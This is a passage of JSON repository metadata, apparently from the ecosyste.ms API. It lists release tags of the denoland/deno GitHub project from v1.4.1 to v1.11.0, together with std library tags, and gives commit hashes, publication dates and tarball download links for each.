a015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fd